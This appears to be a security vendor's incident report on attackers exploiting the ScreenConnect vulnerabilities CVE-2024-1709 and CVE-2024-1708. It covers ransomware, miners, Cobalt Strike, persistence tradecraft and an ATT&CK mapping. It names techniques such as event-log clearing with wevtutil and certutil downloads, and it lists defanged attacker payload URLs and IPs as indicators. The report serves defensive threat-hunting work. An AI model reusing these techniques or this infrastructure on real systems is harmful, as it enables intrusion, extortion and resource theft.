This is some text inside of a div block.
Glitch effect

SlashAndGrab: ScreenConnect Post-Exploitation in the Wild (CVE-2024-1709 & CVE-2024-1708)

|
Glitch effectGlitch effectGlitch effect
Glitch banner

Table of Contents: 

Since February 19, Huntress has been sharing technical details of the ScreenConnect vulnerability we’re calling “SlashAndGrab.” In previous posts, we shared the details of this vulnerability, its exploit, and shared detection guidance.

In this article, we’ve collected and curated threat actor activity fresh from the Huntress Security Operations Center (SOC), where our team has detected and kicked out active adversaries leveraging ScreenConnect access for post-exploitation tradecraft.

The adversaries taking advantage of this vulnerability have been VERY busy. There is a lot to cover here, so buckle up and enjoy some tradecraft! 

Adversaries Deploying Ransomware 

A number of adversaries leveraged their newly ill-gotten ScreenConnect gains to deploy ransomware. 

LockBit

With the impressive joint international takedown efforts to disrupt the LockBit ransomware group, many are asking how “LockBit” is still relevant. The LockBit deployments that we’ve seen are invoked with an encryptor that looks to be compiled around September 13, 2022—which is the same timeline as the leaked LockBit 3.0 builder in the past. One observed filename is classic [.highlight]LB3.exe[.highlight], which again, matches the canned and publicly leaked builder.

We believe this is an important distinction. While the malware deployed appears associated with LockBit, there is no evidence we’ve seen suggesting the joint international takedown efforts are anything short of a landmark milestone to disrupt one of the largest and most active ransomware groups in the world.

Figure 1: Example of LockBit ransomware executed through ScreenConnect

We’ve included the resulting ransom note associated with the above executable. 

Figure 2: Ransomware note 

Other Ransomware Attempts

We observed other ransomware attempts, like [.highlight]upd.exe[.highlight] and [.highlight]svchost.exe[.highlight], that Microsoft Defender consistently neutralized.

We also observed adversaries leverage certutil downloaded ransomware [.highlight].MSI[.highlight] payloads, which they also made persistent via startup folders.

Figure 3: Example of ransomware added as a persistence mechanism

The ransom note from the threat actor who deployed the MSI has been included as well. 

Figure 4: Example ransomware note

Ransomware Anti-Forensics

Ransomware actors also tried to remove event logs via [.highlight]wevtutil.exe cl[.highlight] to frustrate investigators' analysis at a later time. Fortunately, Huntress Managed EDR is far too perceptive to entertain adversarial frustration. 😉 

Figure 5: Example execution of wevtutil.exe log clearing via ScreenConnect

Adversaries Enumerating

There was a particular adversary, using [.highlight]185.62.58[.]132[.highlight], executing a script on compromised systems across multiple unique victim networks. The intent of the script was to identify which of their compromised systems with the highest privileges.

We believe this demonstrates the scale with which threat actors are abusing this vulnerability as they are working to automate their understanding of where to take additional, post-compromise actions moving forward. 

Figure 6: Adversary enumerating the user they control via ScreenConnect 
Figure 7:  Adversary enumerating the user they control via ScreenConnect 

Adversary Cryptocurrency Miners

Somewhat disappointing for a lack of originality, a significant number of adversaries used their ScreenConnect access to deploy cryptocurrency coin miners.

There was a particularly entertaining attempt to masquerade a coinminer as a legitimate SentinelOne file. 

Figure 8: Creation of a coinminer masquerading as SentinelOne

We also observed adversaries downloading and using a xmrig cryptominer, with further details below. 

Adversaries Installing Additional Remote Access

Adversaries seemed to commonly install additional, “legitimate” remote access tools, likely as an attempt to remain persistent even once the ScreenConnect fiasco has been cleared up. 

Simple Help

An adversary we observed installed the Simple Help RMM, from their ScreenConnect initial access.

We observed the Simple Help RMM agent deployed in the following directories:

  • [.highlight]C:\\Users\\oldadmin\\Documents\\Maxx Uptime remote connection\\Files\\agent.exe\[.highlight]
  • [.highlight]C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\restricted\\SimpleService.exe[.highlight]
  • [.highlight]C:\\Users\\oldadmin\\Documents\\MilsoftConnect\\Files\\ta.exe[.highlight]
  • [.highlight]C:\Windows\spsrv.exe[.highlight]

We also observed a configuration file dropped to [.highlight]C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\serviceconfig.xml[.highlight], which revealed it was configured to communicate to the public IPv4 [.highlight]91.92.240[.]71[.highlight].

The user [.highlight]oldadmin[.highlight] was observed being used running similar commands across multiple unique victim organizations.

Figure 9: Execution of Simple Help RMM Agent

SSH

This threat actor leveraged their ScreenConnect access to download and run an SSH backdoor, seemingly to facilitate an RDP connection. 

Figure 10: Huntress report for the aforementioned ssh backdoor

Google Chrome Remote Desktop

We also observed an adversary do something quite interesting with Google Chrome’s Remote Desktop. They pulled the installer directly from Google infrastructure, which stores it as a service—no doubt in the hopes they could persistently and remotely access the environment via a second GUI remote access tool (we enjoy crushing hacker hopes here at Huntress).  

Figure 11: Attempted download of Google Chrome’s Remote Desktop client
Figure 12: Huntress platform detecting the persistent installation of Google Chrome’s Remote Desktop client

Downloading Tools and Payloads

A common tradecraft denominator between the adversaries we observed involved them downloading further tools and payloads.

For example, an adversary leveraged PowerShell’s [.highlight]Invoke-WebRequest[.highlight] ([.highlight]iwr[.highlight]) to call on additional payloads for their SSH persistent tunnel.

Figure 13: Attempted PowerShell cradle download invocation to grab additional post-exploitation tools for SSH tunneling

We also observed an adversary download the SimpleHelp RMM via curl and rename the executables to .png’s in an attempt to evade detection (spoiler: they did not evade detection). 

Figure 14: SimpleHelp RMM renamed to sun.png, accessed via curl download

There was also this straightforward PowerShell downloading activity. However, the file was deleted, and their infrastructure was offline, meaning the file’s intent had not been determined. 

Download Evasion

We also observed adversaries leverage LOLBINs like certutil to download their payloads, likely in an attempt to fly under the radar.

Some adversaries maliciously modified the AV on the host before downloading their payloads. In this specific example, [.highlight]svchost.exe[.highlight] was deleted before analysis could be conducted. 

Figure 15: Evidence of a malicious payload download with defense evasion attempt

Adversaries also used their ScreenConnect sessions to reach out and download Cobalt Strike beacons from their external infrastructure. Specifically, this threat actor saved their beacon as a [.highlight].PDF[.highlight] on a web server, renaming it to a [.highlight].DAT[.highlight] on the targeted machine.

Figure 16: Evidence of Cobalt Strike payload download

Transfer.sh

Interestingly, we observed an adversary mass download cryptocurrency miners using the temporary file upload website [.highlight]transfer.sh[.highlight].

Excerpt of the script (full script in the Appendix): 

Figure 17: PowerShell invocation of malicious script downloaded from Transfer.sh

Adversaries Dropping Cobalt Strike

Unsurprisingly, many adversaries attempted to drop and run a Cobalt Strike beacon on the host. 

Figure 18: Setting exclude directory in Windows Defender for the Cobalt Strike beacon
Figure 19: Execution of Cobalt Strike

It’s also worth noting that Defender thwarted many of these attempts, as seen in Figure 20.

Figure 20: Evidence of Windows Defender neutralizing the Cobalt Strike beacon originating from the ScreenConnect session

It was also common to see the same adversaries drop the (earlier mentioned SentinelUI) cryptocurrency miner and attempt a Cobalt Strike beacon, which Windows Defender would neutralize. 

Figure 21: Evidence of cryptominers and Cobalt Strike being neutralized by Defender

Adversaries Persisting

Adversaries, of course, want to persist in an environment, beyond their initial access method—and for good reason. This ScreenConnect vulnerability had rapid mitigations suggested by Huntress and ConnectWise that would have undermined the adversary’s access. 

Creating New Users

Our SOC observed a number of adversaries prioritize creating their own users, once they landed on a machine, using naming conventions that would attempt to fly under the radar, as well as add these to highly privileged groups.

Figure 22: Evidence of adding a new user

Persistent Reverse Shell

The SOC also observed an adversary transfer a [.highlight]C:\\perflogs\\RunSchedulerTaskOnce.ps1[.highlight] from the ScreenConnect compromised, as confirmed from analysis of Windows Event Log’s [.highlight]Application.evtx - Event ID 0[.highlight].

Figure 23: PowerShell execution of malicious script PowerShell script that included an encoded a Driver.dll

The script was in fact deleted, but could be partially restored by taking the PowerShell Operational EVTX and running this script, which re-stitched the script back together from its ScriptBlockId (excerpt of script below).

Figure 24: Extract of  PowerShell code from PowerShell Operational EVTX
Figure 25: Extract of deobfuscated PowerShell code from CyberChef

This would download a [.highlight]driver.dll[.highlight], and leverage WMI Event Consumer / PwSH persistence (named [.highlight]System__Cmr[.highlight]).

Figure 26: Evidence of the encoded script’s persistence mechanism in the Huntress platform

Wrapping Up

This incredibly interesting ScreenConnect exploit has enamored many of us at Huntress for the last few days, but it’s a shame our adversaries didn’t commit to pairing this new exploit with new tradecraft.

It’s worth driving this point home: most of the post-compromise activities we have documented in this article aren’t novel, original, or outstanding. Most threat actors simply don’t know what to do beyond the same usual, procedural tradecraft; cybercriminals are rarely sophisticated, and the infosec community can beat them together.

Adversaries will default to their “tried and true” methods. An experienced, talented security team can neutralize most threat actors in the middle of their campaigns with ease. We hope this article inspires your security mindset. If you need any help monitoring for activity related to this vulnerability, you can use Huntress' free trial.

If you’re interested in more, come and check out the next episode of our Product Lab webinar, where we’ll be sharing even more technical details behind this threat and answer any questions from the community.

Appendix

ATT&CK

<table><thead><tr><th class="table_header">Tactic</th><th class="table_header">Technique</th><th class="table_header">Description</th></tr></thead><tbody class="table_body"><tr class="table_row"><td class="table_cell white">Initial Access</td><td class="table_cell white">T1190: Exploit Public-Facing Application</td><td class="table_cell white">Adversaries are leveraging a path traversal bug and auth bypass in ScreenConnect that allows them to create a privileged account for remote control.</td></tr><tr class="table_row"><td class="table_cell white">Discovery</td><td class="table_cell white">T1087: Account Discovery</td><td class="table_cell white">Adversaries are attempting to discover privileged users by running a script across compromised systems.</td></tr><tr class="table_row"><td class="table_cell white">Defense Evasion</td><td class="table_cell white">T1562.001: Disable or Modify Tools</td><td class="table_cell white">Adversaries are attempting to evade detection by adding exclusion paths to Windows Defender using PowerShell.</td></tr><tr class="table_row"><td class="table_cell white">Defense Evasion</td><td class="table_cell white">T1070.001: Clear Windows Event Logs</td><td class="table_cell white">Ransomware actors attempt to remove event logs using wevtutil.exe cl command to hinder forensic analysis.</td></tr><tr class="table_row"><td class="table_cell white">Execution</td><td class="table_cell white">T1059: Command and Scripting Interpreter<br /> T1059.001: Powershell<br /> T1059.003: Windows Command Shell </td><td class="table_cell white">Adversaries are using PowerShell and CMD to download and execute scripts from remote locations, facilitating various activities such as cryptocurrency mining and remote access.</td></tr><tr class="table_row"><td class="table_cell white">Persistence</td><td class="table_cell white">T1547.001: Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder</td><td class="table_cell white">Adversaries stored their MSI ransomware payload in the Public startup folder</td></tr><tr class="table_row"><td class="table_cell white">Persistence</td><td class="table_cell white">T1136: Create Account</td><td class="table_cell white">Adversaries created new users and in some instances added them to privileged groups. </td></tr><tr class="table_row"><td class="table_cell white">Persistence</td><td class="table_cell white">T1053: Scheduled Task</td><td class="table_cell white">Adversaries are creating scheduled tasks for their cryptominers and remote access</td></tr><tr class="table_row"><td class="table_cell white">Persistence</td><td class="table_cell white">T1546.003: Event Triggered Execution: Windows Management Instrumentation Event Subscription</td><td class="table_cell white">Adversaries are modifying the registry to achieve persistence by adding WMI Event Consumers.</td></tr><tr class="table_row"><td class="table_cell white">Persistence</td><td class="table_cell white">T1133: External Remote Services</td><td class="table_cell white">Adversaries are compromising ScreenConnect instances, deploying SSH tunnels, Chrome remote desktops, and alternate RMMs for evasive, persistent remote access</td></tr><tr class="table_row"><td class="table_cell white">Command and Control</td><td class="table_cell white">T1105: Ingress Tool Transfer</td><td class="table_cell white">Adversaries are downloading files using curl, certutil, and Invoke-WebRequest.</td></tr><tr class="table_row"><td class="table_cell white">Command and Control</td><td class="table_cell white">T1572: Protocol Tunneling</td><td class="table_cell white">Adversaries created SSH tunnels for communication.</td></tr><tr class="table_row"><td class="table_cell white">Impact</td><td class="table_cell white">T1496: Resource Hijacking</td><td class="table_cell white">Cryptocurrency miners are being deployed by adversaries</td></tr><tr class="table_row"><td class="table_cell white">Impact</td><td class="table_cell white">T1486: Data Encrypted for Impact</td><td class="table_cell white">Adversaries deployed ransomware via compromised ScreenConnect</td></tr><tr class="table_row"><td class="table_cell white">Software</td><td class="table_cell white">S0154: Cobalt Strike</td><td class="table_cell white">Adversaries are leveraging Cobalt Strike beacons to achieve C2 connections to compromised ScreenConnect machines. </td></tr></tbody></table>

IoCs

<table><thead><tr><th class="table_header">IoC Type</th><th class="table_header">Indicator</th><th class="table_header">Hash</th></tr></thead><tbody class="table_body"><tr class="table_row"><td class="table_cell white">Ransomware</td><td class="table_cell white">C:\Windows\TEMP\ScreenConnect\22.5.7881.8171\LB3.exe</td><td class="table_cell white">78a11835b48bbe6a0127b777c0c3cc102e726205f67afefcd82f073e56489e49</td></tr><tr class="table_row"><td class="table_cell white">Ransomware</td><td class="table_cell white">http[:]//23.26.137[.]225:8084/msappdata.msi c:\mpyutd.msi</td><td class="table_cell white">8e51de4774d27ad31a83d5df060ba008148665ab9caf6bc889a5e3fba4d7e600</td></tr><tr class="table_row"><td class="table_cell white">Ransomware</td><td class="table_cell white">UPX.exe</td><td class="table_cell white">2da975fee507060baa1042fb45e8467579abf3f348f1fd37b86bb742db63438a</td></tr><tr class="table_row"><td class="table_cell white">Ransomware</td><td class="table_cell white">svchost.exe</td><td class="table_cell white">a50d9954c0a50e5804065a8165b18571048160200249766bfa2f75d03c8cb6d0</td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/GElU1LmvbS/injcet.ps1</td><td class="table_cell white">ec49f5033374eb8f533e291111e1433e2da127f45857aebbbe614e711b3ca989</td></tr><tr class="table_row"><td class="table_cell white">Cobalt Strike</td><td class="table_cell white">hxxp[://]minish[.]wiki[.]gd/c[.]pdfC:\programdata\update[.]dat</td><td class="table_cell white">0a492d89ea2c05b1724a58dd05b7c4751e1ffdd2eab3a2f6a7ebe65bf3fdd6fe</td></tr><tr class="table_row"><td class="table_cell white">Cobalt Strike</td><td class="table_cell white">C:\perflogs\RunSchedulerTaskOnce.ps1</td><td class="table_cell white">6065fee2d0cb0dc7d0c0788e7e9424088e722dfcf9356d20844d7b2d75b20163</td></tr><tr class="table_row"><td class="table_cell white">Cobalt Strike</td><td class="table_cell white">copy.exe</td><td class="table_cell white">81b4a649a42a157facede979828095ccddcdf6cec47e8a3156530e0c02e9625e</td></tr><tr class="table_row"><td class="table_cell white">Google Chrome Remote Desktop</td><td class="table_cell white">https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msiC:\\ProgramData\\1.msi</td><td class="table_cell white">c47bfe3b3eccc86f87d2b6a38f0f39968f6147c2854f51f235454a54e2134265</td></tr><tr class="table_row"><td class="table_cell white">SimpleHelp RMM</td><td class="table_cell white">https[:]//cmctt.]com/pub/media/wysiwyg/sun.pngC:\Windows\spsrv.exe</td><td class="table_cell white">e8c48250cf7293c95d9af1fb830bb8a5aaf9cfb192d8697d2da729867935c793</td></tr><tr class="table_row"><td class="table_cell white">SimpleHelp RMM</td><td class="table_cell white">cmctt[.]com/pub/media/wysiwyg/invoke.png </td><td class="table_cell white">37a39fc1feb4b14354c4d4b279ba77ba51e0d413f88e6ab991aad5dd6a9c231b</td></tr><tr class="table_row"><td class="table_cell white">SimpleHelp RMM</td><td class="table_cell white">C:\\Users\\oldadmin\\Documents\\Maxx Uptime remote connection\\Files\\agent.exe</td><td class="table_cell white">a0fd0ceb95e775a48a95c00eab42fa5bb170f552005c38812fd03ab4cc14932e</td></tr><tr class="table_row"><td class="table_cell white">SimpleHelp RMM</td><td class="table_cell white">C:\\ProgramData\\JWrapper-Remote Access\\JWAppsSharedConfig\\serviceconfig.xml</td><td class="table_cell white">2e0df44dd75dbdbd70f1a777178ad8a1867cf0738525508b6120ba21f4505f47</td></tr><tr class="table_row"><td class="table_cell white">SimpleHelp RMM IPv4</td><td class="table_cell white">91.92.240[.]71</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">SSH Script</td><td class="table_cell white">d</td><td class="table_cell white">69c7fc246c4867f070e1a7b80c7c41574ee76ab54a8b543a1e0f20ce4a0d5cde</td></tr><tr class="table_row"><td class="table_cell white">SSH Script</td><td class="table_cell white">Z.zip</td><td class="table_cell white">aa9f5ed1eede9aac6d07b0ba13b73185838b159006fa83ed45657d7f333a0efe</td></tr><tr class="table_row"><td class="table_cell white">Beacon</td><td class="table_cell white">driver.dll</td><td class="table_cell white">6e8f83c88a66116e1a7eb10549542890d1910aee0000e3e70f6307aae21f9090</td></tr><tr class="table_row"><td class="table_cell white">Unknown</td><td class="table_cell white">159[.]65[.]130[.]146:4444/svchost.exeC:\Windows\Temp\svchost.exe</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">http://185[.]232[.]92[.]32:8888/SentinelUI.exe</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/s27p8BcTxi/config12[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/ojw6aKoA4A/config11[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/8l4d5qR39o/config9[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/xkIMWnocQH/config8[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/Db5eUfqKP9/config7[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/L1e30KShXP/config6[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/w2Y0iuEKiY/config5[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/6bkwRh4NXd/config4[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/PRBRzMMEKC/config3[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/RWSn6NLIr7/config2[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/MRFibhy8fS/config1[.]json</td><td class="table_cell white"></td></tr><tr class="table_row"><td class="table_cell white">Cryptocurrency Miner</td><td class="table_cell white">hxxps[://]transfer[.]sh/FeDRSFU5XV/config[.]json</td><td class="table_cell white"></td></tr></tbody></table>

Contents of inject.ps1 - Crypto Currency Miner

Acknowledgments

Thank you to the following Huntress SOC analysts for their triage and reporting of the various adversarial activities included in this report: Adrian Garcia, Amelia Casley, Chad Hudson, Dani Dayal, Christopher ‘Dipo’ Rodipe, Dray Agha, Faith Stratton, Herbie Zimmerman, Izzy Spering, Jai Minton, John ‘JB’ Brennan, Jordan Sexton, Josh Allman, Mehtap Ozdemir, Michael Elford, Stephanie Fairless, Susie Faulkner, Tim Kasper.

Special thanks to Josh Allman and Dray Agha for further analysis, and collecting and curating this blog.

Share

Sign Up for Blog Updates

Subscribe today and you’ll be the first to know when new content hits the blog.

By submitting this form, you accept our Privacy Policy
Oops! Something went wrong while submitting the form.
Huntress at work
Response to Incidents
Response to Incidents